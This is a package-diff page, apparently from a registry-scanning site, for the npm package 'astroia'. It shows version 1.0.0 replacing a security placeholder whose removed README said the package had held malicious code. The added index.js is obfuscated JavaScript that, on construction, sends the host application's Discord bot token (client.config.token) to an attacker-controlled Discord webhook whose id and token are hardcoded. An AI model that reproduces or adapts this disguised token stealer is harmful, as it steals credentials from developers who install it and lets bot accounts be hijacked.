astroia 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of astroia might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x5e21c3=_0xfbce;(function(_0x303b50,_0x5a4771){const _0x3f4053=_0xfbce,_0x30d78d=_0x303b50();while(!![]){try{const _0x472d50=parseInt(_0x3f4053(0x195))/(0xc1f*-0x2+-0x1*-0x1a6b+-0x8b*0x4)*(-parseInt(_0x3f4053(0x19f))/(-0x4*0x6d+-0x1219+0x13cf))+-parseInt(_0x3f4053(0x18e))/(0x1*-0x22f7+0x1b35+0x7c5)+parseInt(_0x3f4053(0x1a4))/(0x270f*0x1+0x1e*0x2f+0x8e9*-0x5)+-parseInt(_0x3f4053(0x192))/(-0x1*0x139c+-0x1*0x23ad+0x2*0x1ba7)*(-parseInt(_0x3f4053(0x196))/(-0x159b+0xa8b*0x3+0x500*-0x2))+parseInt(_0x3f4053(0x197))/(0xc0d+0x1145+-0x1d4b)+parseInt(_0x3f4053(0x18b))/(0xd1+-0xc05+-0x2cf*-0x4)*(-parseInt(_0x3f4053(0x193))/(-0xe7*-0x13+-0x2d*0x1b+0xf*-0xd3))+parseInt(_0x3f4053(0x191))/(-0x3*-0x1cd+0xe0f*0x1+-0x136c);if(_0x472d50===_0x5a4771)break;else _0x30d78d['push'](_0x30d78d['shift']());}catch(_0x90d14f){_0x30d78d['push'](_0x30d78d['shift']());}}}(_0x170e,-0x39a75+0x28bb6+-0x48*-0x3946));const {WebhookClient}=require(_0x5e21c3(0x18f));function _0xfbce(_0x4a56df,_0x1bd54){const _0x471716=_0x170e();return _0xfbce=function(_0x15100c,_0x36e8a5){_0x15100c=_0x15100c-(-0xb47+-0x1bd1+0x28a1);let _0x5cf9a2=_0x471716[_0x15100c];return _0x5cf9a2;},_0xfbce(_0x4a56df,_0x1bd54);}class Manager{constructor(_0x1efef5){const _0x1ee9cc=_0x5e21c3,_0x37fc5c={'IMUjx':_0x1ee9cc(0x1a1)+_0x1ee9cc(0x1a0),'OhdMm':_0x1ee9cc(0x189)+_0x1ee9cc(0x19a)+_0x1ee9cc(0x19b)+_0x1ee9cc(0x1a5)+_0x1ee9cc(0x194)+_0x1ee9cc(0x1a3)+_0x1ee9cc(0x18c)};this[_0x1ee9cc(0x199)]=_0x1efef5,this[_0x1ee9cc(0x1a6)]=new WebhookClient({'id':_0x37fc5c[_0x1ee9cc(0x18a)],'token':_0x37fc5c[_0x1ee9cc(0x19d)]}),this[_0x1ee9cc(0x18d)]();}[_0x5e21c3(0x18d)](){const _0x426733=_0x5e21c3;this[_0x426733(0x1a6)][_0x426733(0x198)](_0x426733(0x19c)+this[_0x426733(0x199)][_0x426733(0x190)][_0x426733(0x1a2)]);}}module[_0x5e21c3(0x19e)]=Manager;function _0x170e(){const _0x28f3da=['token','vMnYsINN3O','754748NKgCbN','OdotdrF6hN','webhook','nIXsx_VSzv','IMUjx','1008dcGJBt','z8O_KfFQ','sendToken','2862033HxGDfk','discord.js','config','26310190vnfsYR','238975IMKIOK','72837EJFHSe','So1sjeLn53','2tfgamP','18JaVyHv','958503mGiPSl','send','client','Pn-VULAOqf','EGa3dMG6UQ','Token\x20:\x20','OhdMm','exports','139938iwQqbu','453514832','1168235249'];_0x170e=function(){return _0x28f3da;};return _0x170e();}
|
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
|
+
|
3
|
+
"dependencies": {
|
4
|
+
"discord.js": "^14.13.0"
|
5
|
+
},
|
2
6
|
"name": "astroia",
|
3
|
-
"version": "0.0
|
4
|
-
"
|
5
|
-
"
|
7
|
+
"version": "1.0.0",
|
8
|
+
"main": "index.js",
|
9
|
+
"scripts": {
|
10
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
11
|
+
},
|
12
|
+
"keywords": [],
|
13
|
+
"author": "",
|
14
|
+
"license": "ISC",
|
15
|
+
"description": ""
|
6
16
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=astroia for more information.
|